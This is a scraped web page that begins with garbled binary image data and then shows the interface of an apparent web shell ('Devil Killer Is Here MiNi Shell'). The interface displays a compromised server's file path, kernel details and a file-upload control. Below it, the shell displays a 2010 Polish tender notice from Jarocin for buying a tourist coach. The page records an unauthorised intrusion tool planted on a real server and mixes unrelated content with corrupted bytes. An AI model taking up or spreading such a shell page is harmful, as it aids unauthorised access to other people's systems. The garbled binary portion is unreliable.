JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/123829-N-2010.html

<p class="kh_header"><b>Jarocin: Zakup i dostawa autobusu turystycznego w Jarocinie</b><br>
<b>Numer ogłoszenia: 123829 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jarocińskie Linie Autobusowe Sp. z o.o. , ul. Zaciszna 5, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472948, faks 062 7472948.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jlajarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa autobusu turystycznego w Jarocinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	OPIS PRZEDMIOTU ZAMÓWIENIA:
Przedmiotem zamówienia jest zakup i dostawa jednego autobusu turystycznego -  autobus wysokopokładowy trzyosiowy do przewozów turystycznych spełniający następujące warunki:

2.	OPIS TECHNICZNY AUTOBUSU:

Parametry ogólne:
-	pojemność autobusu: 57 - 61 miejsc pasażerskich, dodatkowo jedno miejsce dla pilota i jedno miejsce dla kierowcy,
-	szerokość autobusu: minimum 2,55 m,
-	długość w przedziale: 13,7 - 14,5 m,
-	wysokość w przedziale: 3,7 - 3,8 m,
-	dopuszczalna masa całkowita: minimum 24 tony.

Konstrukcja i materiały eksploatacyjne:
- oleje i płyny technologiczne, materiały i części zamienne dostępne w sprzedaży na terenie Polski,
-	minimalny przebieg między wymianami oleju i obsługami technicznymi - 60 tys. km,
-	konstrukcja podwozia - nadwozia, kratownica zabezpieczona w technologii kataforezy lub wykonane ze stali nierdzewnej, aluminium,
-	poszycie zewnętrzne zabezpieczone przed korozją w technologii kataforezy lub wykonane z materiałów takich jak: stal nierdzewna, aluminium, tworzywa sztuczne.

Silnik:
-	sześciocylindrowy, czterosuwowy, wysokoprężny z elektronicznie kontrolowanym bezpośrednim wtryskiem, turboładowaniem i intercoolerem. Ulokowany z tyłu, 
w pozycji pionowej. Silnik spełnia wymagania EURO 5 w zakresie emisji spalin 
i hałasu,
-	moc silnika - minimum 420 KM,
-	pojemność - od 12 do 13 litrów.

Układ przeniesienia napędu:
-	skrzynia biegów minimum 6 biegowa + minimum 1 bieg wsteczny, manualna, 
z automatycznym systemem zmiany biegów. Z możliwością pracy skrzyni w dwóch trybach - ekonomicznym i dynamicznym (stosowanym w terenie górzystym),
-	manetka zmiany biegów zintegrowana z siedzeniem kierowcy,
-	retarder hydrauliczny sterowany ręcznie i nożnie,
-	trzy osie, tylna oś skrętna.

Zawieszenie:
-	pneumatyczne, stabilizowane, z dwoma miechami przy pierwszej i trzeciej osi oraz czterema przy drugiej osi, z możliwością regulacji wysokości podczas jazdy
-	przednie zawieszenie niezależne,
-	system ECS, kontrolujący ciśnienie powietrza w miechach,
-	autobus wyposażony w funkcje przyklęku.

Karoseria:
-	szyba przednia panoramiczna wklejana do nadwozia, szyba z klejonego szkła wielowarstwowego, z folią przeciwsłoneczną, z ochroną przeciw promieniom UV,
-	szyby boczne przyciemniane, podwójne, ze szkła hartowanego,
-	elektrycznie sterowane okno kierowcy, z pojedynczą, podgrzewaną szybą,
-	kolorystyka zewnętrzna - zgodnie z kolorystyka Zamawiającego,
-	ściany i dach izolowany cieplnie, gwarantujący nie przedostawanie się do wnętrza wód opadowych i pyłów,
-	boczne pokrywy z zamkami sterowanymi centralnie (obie strony niezależnie),
-	konstrukcja ściany przedniej, absorbująca energię uderzenia w przypadku zderzenia czołowego,
-	system zapobiegający wjechaniu samochodu pod autobus w przypadku zderzenia czołowego,
-	system ochrony kolan kierowcy podczas zderzenia czołowego.

Przedział pasażerski:
-	poszycie wewnętrzne ścian i wykładziny wewnętrzne nawiązujące do kolorystyki autobusu o wysokiej jakości,
-	sufit i ściany boczne wnętrza nadwozia wyłożone tkaniną,
-	w oknach zasłony w kolorze nawiązującym do wnętrza pojazdu,
-	demontowalne dywaniki w przejściu, na stopniach wejściowych i w miejscu pracy kierowcy,
-	siedzenia pasażerskie przeznaczone do komunikacji turystycznej - wysokie, dopasowane do kolorystki wnętrza, z odchylanym oparciem, wyposażone 
w podłokietniki od strony przejścia i od strony ściany, podnóżki, stoliki, siatki, pasy bezpieczeństwa na wszystkich siedzeniach,
-	wentylacja o wysokiej skuteczności,
-	ogrzewanie niezależne wodne o mocy minimum 30 KW z termoizolacją rur, złączek. Złączki i rury wykonane z materiałów odpornych na korozję,
-	o mocy minimum 24 KW z dodatkową funkcją ogrzewania, sterownik kontrolujący wszystkie parametry ogrzewania, klimatyzacji i wentylacji w autobusie (sterowanie automatyczne),
-	system audiowizualny składający się z:
-	odtwarzacza DVD z dwoma monitorami LCD minimum 17 Cali każdy,
-	radioodbiornika z odtwarzaczem CD?MP3,
-	mikrofonu dla kierowcy (zintegrowanego z fotelem kierowcy),
-	mikrofonu dla pilota,
-	wzmacniacza,
-	głośnika dla kierowcy,
-	głośników w przedziale pasażerskim (zintegrowanych z indywidualnymi panelami),
-	selektora dźwięku,
-	przycisków sterowania radiem umieszczonych na kole kierownicy,
-	dodatkowe liniowe oświetlenie schodów,
-	uchwyty i inne akcesoria dla pasażerów wykonane w technologii zapewniającej ochronę przed korozją, funkcjonalność i estetykę.


Miejsce kierowcy:
-	za kierowcą ścianka,
-	fotel kierowcy obrotowy, podgrzewany, z zagłówkiem i podłokietnikami, wyposażony w trzypunktowy pas bezpieczeństwa. Ergonomicznie ukształtowany, wyposażony 
w zintegrowany system pneumatyczny, umożliwiający indywidualne dostosowanie kształtu oparcia do kształtu ciała kierowcy 
-	podparcie lędźwiowe. Możliwość pełnej wielostopniowej regulacji,
-	deska rozdzielcza wyposażona w tachograf cyfrowy i w wyświetlacz ciekłokrystaliczny LCD, przekazujący kierowcy bieżące informacje o stanie pojazdu 
i wyniki diagnostyki wszystkich najważniejszych układów w pojeździe.


Przestrzeń bagażowa:
-	całkowita przestrzeń bagażowa - minimum 11 m3,
-	główne klapy otwierane na pantografach,
-	centralny zamek bagażnikowy (dla każdej strony oddzielny),
-	półki bagażowe (otwarte) nad miejscami siedzącymi,
-	dodatkowe, zamykane schowki dla kierowcy wewnątrz autobusu w przedniej części,
-	oświetlenie komory bagażowej.


Drzwi:
-	2 szt. w układzie 1-1-0, jednoskrzydłowe, sterowane elektropneumatycznie ze stanowiska kierowcy,
-	drzwi z funkcją zabezpieczenia przeciw przytrzaśnięciu.


Układ kierowniczy:
-	przekładnia kierownicza z integralnym wspomaganiem hydraulicznym,
-	kolumna kierownicza z regulacją i blokadą,
-	multimedialne koło kierownicy


Układ hamulcowy:
-	pneumatyczny, oddzielne obwody dla kół przedniej oraz środkowej i tylnej osi,
-	wyposażony w system EBS z funkcją ESP (automatyczna korekta toru jazdy, pozwalająca uniknąć wypadnięcia z trasy podczas pokonywania zakrętu, działająca 
w warunkach utraty przyczepności kół). Dopuszcza się inne systemy równoważne,
-	hamulce tarczowe na wszystkich kołach.

Zbiornik paliwa:
-	minimum 600 l z możliwością tankowania po obu stronach pojazdu.

Zbiornik Ad Blue:
-	minimum 60 l (jeżeli występuje).


Instalacja elektryczna:
-	napięcie znamionowe 24 V,
-	dwa akumulatory o pojemności minimum 220 AH,
-	alternator minimum 3 x 110 A,
-	główny wyłącznik prądu odcinający dopływ paliwa,
-	system elektryczny (podwozia) bazujący na cyfrowym systemie transmisji danych,
-	światła drogowe halogenowe,
-	zewnętrzne lusterka sterowane elektrycznie i podgrzewane.

Koła:
-	komplet opon bezdętkowych, wyważonych 295/80 R 22.5 plus koło zapasowe.

Wyposażenie:
-	toaleta wodna przy drzwiach środkowych,
-	dodatkowy bagażnik na narty (usytuowany nad tylnymi osiami),
-	lodówka przy przednich drzwiach o pojemności minimum 30 l,
-	ekspres do kawy w przedniej części pojazdu,
-	kuchenka mikrofalowa,
-	kabina - sypialnia dla kierowcy za środkowymi drzwiami wyposażona w intercom, wentylację, głośniki, lampkę do czytania; uchylne okno w kabinie kierowcy,
-	termometr wewnętrzny,
-	termometr zewnętrzny,
-	fotel pilota za pierwszymi drzwiami, wyposażony w trzypunktowy pas bezpieczeństwa,
-	oświetlenie dla pilota,
-	indywidualne panele sterowania dla pasażerów z nadmuchami, lampkami 
i głośnikami,
-	sejf na cenne drobiazgi lub dokumenty,
-	alarm cofania,
-	lusterka zewnętrzne na wysięgnikach, ogrzewane, sterowane elektrycznie; zewnętrzne lusterko szerokątne po prawej stronie,
-	oświetlenie wewnętrzne, dwustopniowe jasne/ciemne; oświetlenie nocne,
-	diodowe tylne światła stop i pozycyjne,
-	światła zewnętrzne halogenowe,
-	tempomat,
-	zegar i termometr dla pasażerów,
-	rolety przeciwsłoneczne dla kierowcy na szybie przedniej i bocznej, przednia roleta sterowana elektrycznie,
-	zestaw narzędzi, kliny pod koła,
-	ogranicznik prędkości do 100 km/h

Wyposażenie i urządzenia dodatkowe:
-	gaśnice 6 kg - 2 szt,
-	apteczka,
-	trójkąt ostrzegawczy,
-	klin podkładowy - 2 szt.

Warunki gwarancji:
-	konstrukcja podwozia, nadwozia i poszycia zewnętrzne	-	10 lat,
-	powłoki lakiernicze						-	60 miesięcy,
-	autobus (bez limitu przebiegu)				-	36 miesięcy,

Dodatkowy zakres obejmujący zamówienie:
-	wyposażenie Zamawiającego w polskojęzyczną dokumentację techniczno - eksploatacyjną, która zostanie dostarczona wraz z pojazdem.


Oferowany autobus, w dniu złożenia oferty ostatecznej musi posiadać homologację odpowiadającą warunkom Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 07 października 1999 roku w sprawie homologacji pojazdów (Dz. U. Nr 91), poz. 1039 ze zm.), którą należy dostarczyć wraz z ofertą.
Zamawiający wymaga, aby oferowane autobusy nie były pojazdami prototypowymi, to jest, aby zostały wyprodukowane i wprowadzone do obrotu w krajach UE w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia w liczbie, 
co najmniej 10 sztuk.
Zamawiający uwzględni w tej liczbie autobusy wykonane w różnych wersjach, wynikających z indywidualnych potrzeb odbiorów w pozostałym zakresie.

Zamawiający nie dopuszcza zmian warunków technicznych oraz wyposażenia 
i urządzeń dodatkowych.
Oferty  nie spełniające ww warunków nie będą rozpatrywane.


3.	FINANSOWANIE ZAMÓWIENIA:
Wykonawca otrzyma wynagrodzenie w systemie ratalnym wg niżej wymienionych zasad:
a)	wynagrodzenie Wykonawcy będzie wypłacane przez Zamawiającego przez okres 4 lat, przy czym:
- pierwsza rata spłaty zostanie zrealizowana do 31 października 2010r.
- następne raty: 30 listopada 2011r., 30 listopada 2012r., 30 listopada 2013r. 

Wysokość każdej raty wynosić będzie równo 25% wartości zamówienia,

b)	niedochowanie przez Zamawiającego terminu zapłaty którejkolwiek z rat powoduje natychmiastową wykonalność pozostałej części wynagrodzenia. Sfinansowanie zakupu autobusu będzie obejmowało należności zawierające wartość zakupionego autobusu wraz z podatkiem VAT oraz należne za okres spłaty odsetki na warunkach określonych poniżej,

c)	Wykonawca zapewnia, że nie skorzysta z roszczenia o zapłatę odsetek ustawowych o których mowa w ustawie z dnia 12 czerwca 2003r. o terminach zapłaty w transakcjach handlowych ( Dz. U. nr 139, poz.1323). W przeciwnym razie Wykonawca zobowiązuje się do zapłaty odszkodowania w wysokości odpowiadającej naliczonym odsetkom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.12.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 10 000,00 zł  (słownie: dziesięć tysięcy 00/100 zł) w jednej z form określonych w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych na rachunek bankowy nr:  
97 1090 1131 0000 0000 1300 3386. 
W przypadku wniesienia wadium w formie niepieniężnej, oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć w siedzibie Zamawiającego, sekretariat do dnia 24.05.2010r.  do godz. 09:00. Ksero potwierdzone  za zgodność z oryginałem należy dołączyć do oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli wykonawca przedstawi koncesje, zezwolenia lub licencję, których posiadanie wymagają ustawy celem podjęcia działalności gospodarczej w zakresie objętym przedmiotem zamówienia. Wykonawca przedkłada powyższe dokumenty jeżeli go dotyczą</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli wykonawca wykaże się doświadczeniem w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzech dostaw do różnych odbiorców na rynek państw członkowskich Unii Europejskiej lub krajów stowarzyszonych, w ilości co najmniej 10 sztuk autobusów oferowanej marki i typu, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorcy, oraz załączeniem dokumentów potwierdzających, że  dostawy te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że znajduje się 
w sytuacji ekonomicznej i finansowej zapewniającej prawidłowe wykonanie przedmiotu zamówienia oraz, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Dokument dopuszczenia autobusu do ruchu na terenie  Polski zgodnie
z obowiązującymi przepisami - aktualne świadectwo homologacji oferowanego autobusu;
b)	Zdjęcie lub rysunek ofertowy oferowanego autobusu;
c)	Certyfikaty potwierdzające, że wszystkie elementy nadwozia stanowiące wyposażenie przedziału pasażerskiego oraz kabiny kierowcy oferowanych autobusów spełniają warunek niepalności;
d)	Certyfikat zgodności konstrukcji silników oferowanych autobusów 
z wymogami normy EURO 5</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U 2007 Nr 223 poz. 1655 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie:

1.	Terminu realizacji zamówienia; termin realizacji zamówienia może ulec zmianie 
w przypadku:
a)	zaistnienia okoliczności zawartych w art. 67 ust. 1 pkt. 5 ustawy z dnia 
29 stycznia 2004 r. Prawo zamówień publicznych,
b)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,

2.Wynagrodzenia za przedmiot zamówienia; wynagrodzenie wykonawcy może ulec zmianie w przypadku:
c)	 zaistnienia okoliczności zawartych w art. 67 ust. 1 pkt. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych;
d)	  zmiany powszechnie obowiązujących przepisów w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia,

3.Zmian technicznych o ile są one dla Zamawiającego korzystne i obiektywnie uzasadnione</p>
